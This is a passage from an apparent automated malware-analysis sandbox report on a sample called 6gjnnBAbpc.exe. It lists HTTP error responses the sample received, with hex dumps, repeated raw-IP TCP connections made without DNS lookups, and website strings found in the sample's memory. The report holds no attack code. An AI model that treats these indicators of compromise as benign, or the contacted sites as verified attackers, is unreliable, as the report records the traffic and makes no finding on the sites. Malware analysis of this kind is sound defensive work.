61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 64 38 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BUPHlvNKUUP2NOtpCuN2iPyNJsdKpKMCq4srG9RWw4K5K0zZ%2BLN3JIxh11ovbQzP%2Bun0kBMjY6zMqwsrsW0Hr6hIQx%2BfV2ef2mRSxag1Ttrpt8JemklNNUoVJ1AB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9944df93604-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 61 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 Data Ascii: 1afc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 22 Mar 2023 04:46:10 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KhL7yn7VTGVJcfutBFd5sWPaIu7ISxO8GCwKQjapR0q%2BEpcKVBwo2lfJnZbUzUeMnBWwqRSvH7eCjtzEJiPqGpeh1fqp%2FWxRisx8QdKglSDOo%2BIoO9jhFs%2BTd69d0Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc9b67e239be9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:55 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:55 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:46:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:55 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: TOSNaWYd/lVFhvNlBData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:45:56 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.linkedin.com/company/elpro-lepenik/about/" target="_blank"><img id="LinkedIn" alt="LinkedIn" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg" /></a> equals www.linkedin.com (Linkedin)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="footicons" href="https://www.facebook.com/elprolepenik/" target="_blank"><img id="Facebook" alt="Facebook" src="http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-FB-Grey.svg" /></a> equals www.facebook.com (Facebook)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/elprolepenik/" /> equals www.facebook.com (Facebook)
